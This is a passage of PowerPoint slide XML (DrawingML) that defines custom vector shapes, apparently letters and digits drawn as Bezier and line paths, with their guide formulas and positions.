                        <a:pt x="0" y="33"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="4" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="14"/>
                        <a:pt x="4" y="14"/>
                        <a:pt x="4" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="14"/>
                        <a:pt x="9" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="14"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="14" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="13"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="17" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="11"/>
                        <a:pt x="17" y="10"/>
                        <a:pt x="17" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="7"/>
                        <a:pt x="17" y="6"/>
                        <a:pt x="17" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="5"/>
                        <a:pt x="15" y="4"/>
                        <a:pt x="14" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="3"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBez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96"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8872538" y="4518026"/>
                  <a:ext cx="79375" cy="79375"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 17 w 35"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 30 w 35"/>
                    <a:gd name="T3" fmla="*/ 5 h 34"/>
                    <a:gd name="T4" fmla="*/ 35 w 35"/>
                    <a:gd name="T5" fmla="*/ 17 h 34"/>
                    <a:gd name="T6" fmla="*/ 30 w 35"/>
                    <a:gd name="T7" fmla="*/ 29 h 34"/>
                    <a:gd name="T8" fmla="*/ 18 w 35"/>
                    <a:gd name="T9" fmla="*/ 34 h 34"/>
                    <a:gd name="T10" fmla="*/ 5 w 35"/>
                    <a:gd name="T11" fmla="*/ 29 h 34"/>
                    <a:gd name="T12" fmla="*/ 0 w 35"/>
                    <a:gd name="T13" fmla="*/ 17 h 34"/>
                    <a:gd name="T14" fmla="*/ 3 w 35"/>
                    <a:gd name="T15" fmla="*/ 9 h 34"/>
                    <a:gd name="T16" fmla="*/ 9 w 35"/>
                    <a:gd name="T17" fmla="*/ 2 h 34"/>
                    <a:gd name="T18" fmla="*/ 17 w 35"/>
                    <a:gd name="T19" fmla="*/ 0 h 34"/>
                    <a:gd name="T20" fmla="*/ 18 w 35"/>
                    <a:gd name="T21" fmla="*/ 3 h 34"/>
                    <a:gd name="T22" fmla="*/ 11 w 35"/>
                    <a:gd name="T23" fmla="*/ 5 h 34"/>
                    <a:gd name="T24" fmla="*/ 6 w 35"/>
                    <a:gd name="T25" fmla="*/ 10 h 34"/>
                    <a:gd name="T26" fmla="*/ 4 w 35"/>
                    <a:gd name="T27" fmla="*/ 17 h 34"/>
                    <a:gd name="T28" fmla="*/ 8 w 35"/>
                    <a:gd name="T29" fmla="*/ 27 h 34"/>
                    <a:gd name="T30" fmla="*/ 18 w 35"/>
                    <a:gd name="T31" fmla="*/ 31 h 34"/>
                    <a:gd name="T32" fmla="*/ 25 w 35"/>
                    <a:gd name="T33" fmla="*/ 29 h 34"/>
                    <a:gd name="T34" fmla="*/ 30 w 35"/>
                    <a:gd name="T35" fmla="*/ 24 h 34"/>
                    <a:gd name="T36" fmla="*/ 32 w 35"/>
                    <a:gd name="T37" fmla="*/ 17 h 34"/>
                    <a:gd name="T38" fmla="*/ 30 w 35"/>
                    <a:gd name="T39" fmla="*/ 10 h 34"/>
                    <a:gd name="T40" fmla="*/ 25 w 35"/>
                    <a:gd name="T41" fmla="*/ 5 h 34"/>
                    <a:gd name="T42" fmla="*/ 18 w 35"/>
                    <a:gd name="T43"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34">
                      <a:moveTo>
                        <a:pt x="17" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="0"/>
                        <a:pt x="27" y="2"/>
                        <a:pt x="30" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="8"/>
                        <a:pt x="35" y="12"/>
                        <a:pt x="35" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="22"/>
                        <a:pt x="33" y="26"/>
                        <a:pt x="30" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="33"/>
                        <a:pt x="23" y="34"/>
                        <a:pt x="18" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="34"/>
                        <a:pt x="9" y="33"/>
                        <a:pt x="5" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="26"/>
                        <a:pt x="0" y="22"/>
                        <a:pt x="0" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="14"/>
                        <a:pt x="1" y="11"/>
                        <a:pt x="3" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="6" y="4"/>
                        <a:pt x="9" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="1"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="17" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="18" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="3"/>
                        <a:pt x="13" y="4"/>
                        <a:pt x="11" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="6"/>
                        <a:pt x="7" y="8"/>
                        <a:pt x="6" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="12"/>
                        <a:pt x="4" y="15"/>
                        <a:pt x="4" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="21"/>
                        <a:pt x="5" y="25"/>
                        <a:pt x="8" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="30"/>
                        <a:pt x="14" y="31"/>
                        <a:pt x="18" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="31"/>
                        <a:pt x="22" y="31"/>
                        <a:pt x="25" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="28"/>
                        <a:pt x="28" y="26"/>
                        <a:pt x="30" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="22"/>
                        <a:pt x="32" y="20"/>
                        <a:pt x="32" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="15"/>
                        <a:pt x="31" y="12"/>
                        <a:pt x="30" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="8"/>
                        <a:pt x="27" y="6"/>
                        <a:pt x="25" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="4"/>
                        <a:pt x="20" y="3"/>
                        <a:pt x="1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97"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8966200" y="4519613"/>
                  <a:ext cx="39688" cy="77788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25"/>
                    <a:gd name="T1" fmla="*/ 0 h 49"/>
                    <a:gd name="T2" fmla="*/ 25 w 25"/>
                    <a:gd name="T3" fmla="*/ 0 h 49"/>
                    <a:gd name="T4" fmla="*/ 25 w 25"/>
                    <a:gd name="T5" fmla="*/ 5 h 49"/>
                    <a:gd name="T6" fmla="*/ 6 w 25"/>
                    <a:gd name="T7" fmla="*/ 5 h 49"/>
                    <a:gd name="T8" fmla="*/ 6 w 25"/>
                    <a:gd name="T9" fmla="*/ 19 h 49"/>
                    <a:gd name="T10" fmla="*/ 25 w 25"/>
                    <a:gd name="T11" fmla="*/ 19 h 49"/>
                    <a:gd name="T12" fmla="*/ 25 w 25"/>
                    <a:gd name="T13" fmla="*/ 25 h 49"/>
                    <a:gd name="T14" fmla="*/ 6 w 25"/>
                    <a:gd name="T15" fmla="*/ 25 h 49"/>
                    <a:gd name="T16" fmla="*/ 6 w 25"/>
                    <a:gd name="T17" fmla="*/ 49 h 49"/>
                    <a:gd name="T18" fmla="*/ 0 w 25"/>
                    <a:gd name="T19" fmla="*/ 49 h 49"/>
                    <a:gd name="T20" fmla="*/ 0 w 25"/>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49">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="25" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4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98"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9017000" y="4519613"/>
                  <a:ext cx="7938" cy="777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99"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9042400" y="4519613"/>
                  <a:ext cx="36513" cy="77788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 23"/>
                    <a:gd name="T1" fmla="*/ 0 h 49"/>
                    <a:gd name="T2" fmla="*/ 5 w 23"/>
                    <a:gd name="T3" fmla="*/ 0 h 49"/>
                    <a:gd name="T4" fmla="*/ 5 w 23"/>
                    <a:gd name="T5" fmla="*/ 43 h 49"/>
                    <a:gd name="T6" fmla="*/ 23 w 23"/>
                    <a:gd name="T7" fmla="*/ 43 h 49"/>
                    <a:gd name="T8" fmla="*/ 23 w 23"/>
                    <a:gd name="T9" fmla="*/ 49 h 49"/>
                    <a:gd name="T10" fmla="*/ 0 w 23"/>
                    <a:gd name="T11" fmla="*/ 49 h 49"/>
                    <a:gd name="T12" fmla="*/ 0 w 23"/>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3" h="49">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="5" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="43"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="43"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4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200"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9091613" y="4519613"/>
                  <a:ext cx="42863" cy="77788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 27"/>
                    <a:gd name="T1" fmla="*/ 0 h 49"/>
                    <a:gd name="T2" fmla="*/ 27 w 27"/>
                    <a:gd name="T3" fmla="*/ 0 h 49"/>
                    <a:gd name="T4" fmla="*/ 27 w 27"/>
                    <a:gd name="T5" fmla="*/ 5 h 49"/>
                    <a:gd name="T6" fmla="*/ 4 w 27"/>
                    <a:gd name="T7" fmla="*/ 5 h 49"/>
                    <a:gd name="T8" fmla="*/ 4 w 27"/>
                    <a:gd name="T9" fmla="*/ 19 h 49"/>
                    <a:gd name="T10" fmla="*/ 27 w 27"/>
                    <a:gd name="T11" fmla="*/ 19 h 49"/>
                    <a:gd name="T12" fmla="*/ 27 w 27"/>
                    <a:gd name="T13" fmla="*/ 25 h 49"/>
                    <a:gd name="T14" fmla="*/ 4 w 27"/>
                    <a:gd name="T15" fmla="*/ 25 h 49"/>
                    <a:gd name="T16" fmla="*/ 4 w 27"/>
                    <a:gd name="T17" fmla="*/ 43 h 49"/>
                    <a:gd name="T18" fmla="*/ 27 w 27"/>
                    <a:gd name="T19" fmla="*/ 43 h 49"/>
                    <a:gd name="T20" fmla="*/ 27 w 27"/>
                    <a:gd name="T21" fmla="*/ 49 h 49"/>
                    <a:gd name="T22" fmla="*/ 0 w 27"/>
                    <a:gd name="T23" fmla="*/ 49 h 49"/>
                    <a:gd name="T24" fmla="*/ 0 w 27"/>
                    <a:gd name="T2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9">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="27" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="43"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="43"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4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201"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8747125" y="4624388"/>
                  <a:ext cx="49213" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 31"/>
                    <a:gd name="T1" fmla="*/ 0 h 48"/>
                    <a:gd name="T2" fmla="*/ 31 w 31"/>
                    <a:gd name="T3" fmla="*/ 0 h 48"/>
                    <a:gd name="T4" fmla="*/ 6 w 31"/>
                    <a:gd name="T5" fmla="*/ 48 h 48"/>
                    <a:gd name="T6" fmla="*/ 1 w 31"/>
                    <a:gd name="T7" fmla="*/ 47 h 48"/>
                    <a:gd name="T8" fmla="*/ 23 w 31"/>
                    <a:gd name="T9" fmla="*/ 4 h 48"/>
                    <a:gd name="T10" fmla="*/ 0 w 31"/>
                    <a:gd name="T11" fmla="*/ 4 h 48"/>
                    <a:gd name="T12" fmla="*/ 0 w 31"/>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1" h="48">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="31" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="23" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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202"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8802688" y="4624388"/>
                  <a:ext cx="50800" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 21 w 22"/>
                    <a:gd name="T1" fmla="*/ 0 h 33"/>
                    <a:gd name="T2" fmla="*/ 21 w 22"/>
                    <a:gd name="T3" fmla="*/ 3 h 33"/>
                    <a:gd name="T4" fmla="*/ 9 w 22"/>
                    <a:gd name="T5" fmla="*/ 3 h 33"/>
                    <a:gd name="T6" fmla="*/ 8 w 22"/>
                    <a:gd name="T7" fmla="*/ 12 h 33"/>
                    <a:gd name="T8" fmla="*/ 11 w 22"/>
                    <a:gd name="T9" fmla="*/ 11 h 33"/>
                    <a:gd name="T10" fmla="*/ 19 w 22"/>
                    <a:gd name="T11" fmla="*/ 14 h 33"/>
                    <a:gd name="T12" fmla="*/ 22 w 22"/>
                    <a:gd name="T13" fmla="*/ 22 h 33"/>
                    <a:gd name="T14" fmla="*/ 20 w 22"/>
                    <a:gd name="T15" fmla="*/ 28 h 33"/>
                    <a:gd name="T16" fmla="*/ 16 w 22"/>
                    <a:gd name="T17" fmla="*/ 32 h 33"/>
                    <a:gd name="T18" fmla="*/ 10 w 22"/>
                    <a:gd name="T19" fmla="*/ 33 h 33"/>
                    <a:gd name="T20" fmla="*/ 4 w 22"/>
                    <a:gd name="T21" fmla="*/ 31 h 33"/>
                    <a:gd name="T22" fmla="*/ 0 w 22"/>
                    <a:gd name="T23" fmla="*/ 24 h 33"/>
                    <a:gd name="T24" fmla="*/ 4 w 22"/>
                    <a:gd name="T25" fmla="*/ 24 h 33"/>
                    <a:gd name="T26" fmla="*/ 5 w 22"/>
                    <a:gd name="T27" fmla="*/ 27 h 33"/>
                    <a:gd name="T28" fmla="*/ 7 w 22"/>
                    <a:gd name="T29" fmla="*/ 29 h 33"/>
                    <a:gd name="T30" fmla="*/ 11 w 22"/>
                    <a:gd name="T31" fmla="*/ 30 h 33"/>
                    <a:gd name="T32" fmla="*/ 16 w 22"/>
                    <a:gd name="T33" fmla="*/ 28 h 33"/>
                    <a:gd name="T34" fmla="*/ 18 w 22"/>
                    <a:gd name="T35" fmla="*/ 22 h 33"/>
                    <a:gd name="T36" fmla="*/ 16 w 22"/>
                    <a:gd name="T37" fmla="*/ 16 h 33"/>
                    <a:gd name="T38" fmla="*/ 11 w 22"/>
                    <a:gd name="T39" fmla="*/ 14 h 33"/>
                    <a:gd name="T40" fmla="*/ 4 w 22"/>
                    <a:gd name="T41" fmla="*/ 16 h 33"/>
                    <a:gd name="T42" fmla="*/ 7 w 22"/>
                    <a:gd name="T43" fmla="*/ 0 h 33"/>
                    <a:gd name="T44" fmla="*/ 21 w 22"/>
                    <a:gd name="T4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33">
                      <a:moveTo>
                        <a:pt x="21" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="3"/>
                        <a:pt x="21" y="3"/>
                        <a:pt x="21" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="3"/>
                        <a:pt x="9" y="3"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="8" y="12"/>
                        <a:pt x="8" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="11"/>
                        <a:pt x="10" y="11"/>
                        <a:pt x="11" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="11"/>
                        <a:pt x="17" y="12"/>
                        <a:pt x="19" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="16"/>
                        <a:pt x="22" y="19"/>
                        <a:pt x="22" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="24"/>
                        <a:pt x="21" y="26"/>
                        <a:pt x="20" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="29"/>
                        <a:pt x="18" y="31"/>
                        <a:pt x="16" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="33"/>
                        <a:pt x="13" y="33"/>
                        <a:pt x="10" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="33"/>
                        <a:pt x="5" y="32"/>
                        <a:pt x="4" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="29"/>
                        <a:pt x="1" y="27"/>
                        <a:pt x="0" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="24"/>
                        <a:pt x="4" y="24"/>
                        <a:pt x="4" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="26"/>
                        <a:pt x="4" y="27"/>
                        <a:pt x="5" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="28"/>
                        <a:pt x="6" y="29"/>
                        <a:pt x="7" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="30"/>
                        <a:pt x="9" y="30"/>
                        <a:pt x="11" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="30"/>
                        <a:pt x="15" y="29"/>
                        <a:pt x="16" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="26"/>
                        <a:pt x="18" y="24"/>
                        <a:pt x="18" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="19"/>
                        <a:pt x="18" y="18"/>
                        <a:pt x="16" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="15"/>
                        <a:pt x="13" y="14"/>
                        <a:pt x="11" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="14"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="4" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBez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203"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8863013" y="4624388"/>
                  <a:ext cx="47625" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 20 w 21"/>
                    <a:gd name="T1" fmla="*/ 0 h 33"/>
                    <a:gd name="T2" fmla="*/ 20 w 21"/>
                    <a:gd name="T3" fmla="*/ 3 h 33"/>
                    <a:gd name="T4" fmla="*/ 9 w 21"/>
                    <a:gd name="T5" fmla="*/ 3 h 33"/>
                    <a:gd name="T6" fmla="*/ 7 w 21"/>
                    <a:gd name="T7" fmla="*/ 12 h 33"/>
                    <a:gd name="T8" fmla="*/ 11 w 21"/>
                    <a:gd name="T9" fmla="*/ 11 h 33"/>
                    <a:gd name="T10" fmla="*/ 18 w 21"/>
                    <a:gd name="T11" fmla="*/ 14 h 33"/>
                    <a:gd name="T12" fmla="*/ 21 w 21"/>
                    <a:gd name="T13" fmla="*/ 22 h 33"/>
                    <a:gd name="T14" fmla="*/ 20 w 21"/>
                    <a:gd name="T15" fmla="*/ 28 h 33"/>
                    <a:gd name="T16" fmla="*/ 15 w 21"/>
                    <a:gd name="T17" fmla="*/ 32 h 33"/>
                    <a:gd name="T18" fmla="*/ 10 w 21"/>
                    <a:gd name="T19" fmla="*/ 33 h 33"/>
                    <a:gd name="T20" fmla="*/ 3 w 21"/>
                    <a:gd name="T21" fmla="*/ 31 h 33"/>
                    <a:gd name="T22" fmla="*/ 0 w 21"/>
                    <a:gd name="T23" fmla="*/ 24 h 33"/>
                    <a:gd name="T24" fmla="*/ 3 w 21"/>
                    <a:gd name="T25" fmla="*/ 24 h 33"/>
                    <a:gd name="T26" fmla="*/ 4 w 21"/>
                    <a:gd name="T27" fmla="*/ 27 h 33"/>
                    <a:gd name="T28" fmla="*/ 7 w 21"/>
                    <a:gd name="T29" fmla="*/ 29 h 33"/>
                    <a:gd name="T30" fmla="*/ 10 w 21"/>
                    <a:gd name="T31" fmla="*/ 30 h 33"/>
                    <a:gd name="T32" fmla="*/ 15 w 21"/>
                    <a:gd name="T33" fmla="*/ 28 h 33"/>
                    <a:gd name="T34" fmla="*/ 18 w 21"/>
                    <a:gd name="T35" fmla="*/ 22 h 33"/>
                    <a:gd name="T36" fmla="*/ 16 w 21"/>
                    <a:gd name="T37" fmla="*/ 16 h 33"/>
                    <a:gd name="T38" fmla="*/ 10 w 21"/>
                    <a:gd name="T39" fmla="*/ 14 h 33"/>
                    <a:gd name="T40" fmla="*/ 3 w 21"/>
                    <a:gd name="T41" fmla="*/ 16 h 33"/>
                    <a:gd name="T42" fmla="*/ 6 w 21"/>
                    <a:gd name="T43" fmla="*/ 0 h 33"/>
                    <a:gd name="T44" fmla="*/ 20 w 21"/>
                    <a:gd name="T4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33">
                      <a:moveTo>
                        <a:pt x="20" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="3"/>
                        <a:pt x="20" y="3"/>
                        <a:pt x="20" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="3"/>
                        <a:pt x="9" y="3"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="12"/>
                        <a:pt x="7" y="12"/>
                        <a:pt x="7" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="11"/>
                        <a:pt x="10" y="11"/>
                        <a:pt x="11" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="11"/>
                        <a:pt x="16" y="12"/>
                        <a:pt x="18" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="16"/>
                        <a:pt x="21" y="19"/>
                        <a:pt x="21" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="24"/>
                        <a:pt x="21" y="26"/>
                        <a:pt x="20" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="29"/>
                        <a:pt x="17" y="31"/>
                        <a:pt x="15" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="33"/>
                        <a:pt x="12" y="33"/>
                        <a:pt x="10" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="33"/>
                        <a:pt x="5" y="32"/>
                        <a:pt x="3" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="29"/>
                        <a:pt x="0" y="27"/>
                        <a:pt x="0" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="24"/>
                        <a:pt x="3" y="24"/>
                        <a:pt x="3" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="26"/>
                        <a:pt x="4" y="27"/>
                        <a:pt x="4" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="28"/>
                        <a:pt x="6" y="29"/>
                        <a:pt x="7" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="30"/>
                        <a:pt x="9" y="30"/>
                        <a:pt x="10" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="30"/>
                        <a:pt x="14" y="29"/>
                        <a:pt x="15" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="26"/>
                        <a:pt x="18" y="24"/>
                        <a:pt x="18" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="19"/>
                        <a:pt x="17" y="18"/>
                        <a:pt x="16" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="15"/>
                        <a:pt x="12" y="14"/>
                        <a:pt x="10" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="14"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="3" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                      </a:cubicBez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204"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8920163" y="4622801"/>
                  <a:ext cx="50800" cy="77788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4 w 22"/>
